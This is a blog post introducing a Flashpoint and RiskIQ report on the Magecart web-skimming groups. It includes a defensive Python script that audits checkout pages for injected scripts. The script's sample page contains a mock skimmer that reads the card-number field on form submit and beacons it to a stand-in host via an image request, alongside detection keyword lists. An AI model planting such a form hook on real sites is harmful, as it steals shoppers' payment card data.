‘Inside Magecart’ Exposes the Operation Behind the Web’s Biggest E-Commerce Scourge
For three years, the Magecart group—the name given to a collective of at least seven cybercrime outfits—has been a scourge to e-commerce. Using the digital equivalent of physical credit-card skimmers on high-profile websites, the group is alleged to be responsible for the loss of hundreds of thousands of payment card records and the personal data of its victims.
Only in the last few months, after three major breaches were unraveled, has Magecart entered the public consciousness.
Today, researchers at Flashpoint and RiskIQ are releasing the most comprehensive look inside the Magecart operation to date. Available for download, “Inside Magecart” examines each of the seven groups believed to make up the Magecart threat, including a thorough investigation into the infrastructure supporting these operations, the technical sophistication of the skimmer malware dropped onto the sites of its victims, and how victims are accessed and compromised.
The list of groups in the report is not definitive, nor is it comprehensive. It is a deep look at the operations currently being tracked; security personnel inside the enterprise should understand that there are likely more groups and operations taking part in web-skimming activity under the Magecart name. As with most activity in the criminal underground, once one outfit is seen to succeed, others are likely to join in and bring with them their own tools and operations, adding more competition and activity to an already crowded space.
The report melds the seven groups into six after a link was found between two of these outfits in the way they profited by using the same fraudulent reshipping operation. The groups differ in their capabilities and approaches to targeting victims. Some cast a wide net and use automated tools, opting for a high volume of victims. These operations, however, may use different variants of skimming malware to distinguish themselves from one another. Other groups, meanwhile, are much more advanced in the malware they use, the means they deploy to avoid detection, or in their approach toward targeting only high-profile victims.
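Whatever skimmer variant a group uses, two things do not change: the skimmer code has to be loaded into the checkout page, and the captured card data has to leave the page for infrastructure the attacker controls. The following script is an added illustration, not code from the report or its authors, of a first-pass audit a site owner can run over their own checkout HTML: it inventories every `<script>` element, flags script origins outside an allowlist, flags third-party scripts loaded without Subresource Integrity, and applies a coarse heuristic to inline scripts that both read a payment field and use a network primitive. The allowlist, the domains, and the sample page (including the inline script that mimics a form-submit hook beaconing a card number out via an image request) are all constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hypothetical allowlist: origins the site owner expects to serve script on the checkout page.
ALLOWED_ORIGINS = {"https://shop.example", "https://cdn.example"}

# Coarse heuristic inputs for inline scripts (assumption: field names used by this shop's form).
PAYMENT_FIELD_HINTS = ("cc_number", "card_number", "cvv", "cvc")
NETWORK_PRIMITIVES = ("new Image(", "fetch(", "XMLHttpRequest", "sendBeacon(")


class ScriptInventory(HTMLParser):
    """Collect every <script>: its src, integrity attribute and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self.scripts.append({"src": a.get("src"), "integrity": a.get("integrity"), "inline": ""})
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        # html.parser delivers <script> bodies as raw data, so this captures inline code.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts[-1]["inline"] = "".join(self._buf).strip()
            self._in_script = False


def origin_of(url):
    """Return scheme://host[:port] for an absolute URL, or None for a relative one."""
    parts = urlsplit(url)
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}"


def audit_checkout_page(html, page_url, allowed_origins=ALLOWED_ORIGINS):
    """Return a list of (finding, detail) tuples for the scripts on a checkout page."""
    parser = ScriptInventory()
    parser.feed(html)
    page_origin = origin_of(page_url)
    scheme = urlsplit(page_url).scheme
    findings = []
    for s in parser.scripts:
        if s["src"]:
            src = s["src"]
            if src.startswith("//"):          # protocol-relative URL inherits the page scheme
                src = f"{scheme}:{src}"
            origin = origin_of(src) or page_origin
            if origin != page_origin and origin not in allowed_origins:
                findings.append(("unexpected-origin", s["src"]))
            elif origin != page_origin and not s["integrity"]:
                # Third-party script with no SRI hash: a swapped file would load unnoticed.
                findings.append(("no-sri", s["src"]))
        elif s["inline"]:
            body = s["inline"]
            reads_card = any(h in body for h in PAYMENT_FIELD_HINTS)
            sends_out = any(n in body for n in NETWORK_PRIMITIVES)
            if reads_card and sends_out:
                findings.append(("inline-exfil-pattern", body[:60]))
    return findings


# Constructed sample checkout page; the last two scripts model an injected skimmer.
SAMPLE_CHECKOUT_HTML = """
<html><body>
<form id="payment"><input name="cc_number"><input name="cvv"></form>
<script src="/js/checkout.js"></script>
<script src="https://cdn.example/lib.js" integrity="sha384-AbCdEf"></script>
<script src="https://cdn.example/analytics.js"></script>
<script src="https://static-stats-cdn.example.net/jquery.min.js"></script>
<script>
  document.querySelector("form#payment").addEventListener("submit", function () {
    var n = document.getElementsByName("cc_number")[0].value;
    new Image().src = "https://static-stats-cdn.example.net/i.gif?d=" + btoa(n);
  });
</script>
</body></html>
"""

if __name__ == "__main__":
    for kind, detail in audit_checkout_page(SAMPLE_CHECKOUT_HTML, "https://shop.example/checkout"):
        print(f"{kind:22s} {detail}")
```

Run against the sample, the audit reports the unknown origin, the allowlisted CDN script that lacks an integrity hash, and the inline submit hook. The allowlist check is the one that catches most injected loaders; the inline heuristic is deliberately crude and will miss obfuscated code, so it is a tripwire rather than a detector.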
The report also examines the commercial side of the Magecart operation, focusing on the sale and distribution of stolen cards through underground markets. It also details other means of monetization, such as mule handling and the shipping of goods. Finally, readers will learn more about the underground supply chain behind Magecart, and how skimmer kits and compromised e-commerce sites are offered as a service.
This is the deepest, publicly reported look into the Magecart operations and an important exposé into the activities of one of the most dangerous and profitable cybercrime outfits operating on the underground today.
Director of Research – Flashpoint
Vitali Kremez is a Director of Research at Flashpoint. He oversees analyst collection efforts and leads a technical team that specializes in researching and investigating complex cyber attacks, network intrusions, data breaches, and hacking incidents. Vitali is a strong believer in responsible disclosure and has helped enterprises and government agencies bring indictments in many high-profile investigations involving data breaches, network intrusions, ransomware, computer hacking, intellectual property theft, credit card fraud, money laundering, and identity theft. Previously, Vitali enjoyed a rewarding career as a Cybercrime Investigative Analyst for the New York County District Attorney’s Office.
He has earned the majority of certifications available in the information technology, information security, digital forensics, and fraud intelligence fields. A renowned expert, speaker, blogger, and columnist, Vitali has contributed articles to Dark Reading, BusinessReview, and Infosecurity Magazine and is a frequent commentator on cybercrime, hacking incidents, policy, and security.
Threat Researcher – RiskIQ
Jordan Herman is a Threat Researcher at RiskIQ.
Threat Researcher – RiskIQ
Yonathan Klijnsma is a Threat Researcher at RiskIQ.